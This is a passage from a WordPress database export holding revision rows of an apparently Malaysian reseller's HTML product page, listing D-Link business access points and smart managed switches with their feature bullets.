(EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:39:34','2019-09-25 04:39:34','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3373,1,'2019-09-25 12:41:01','2019-09-25 04:41:01','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:41:01','2019-09-25 04:41:01','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3374,1,'2019-09-25 12:41:58','2019-09-25 04:41:58','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ 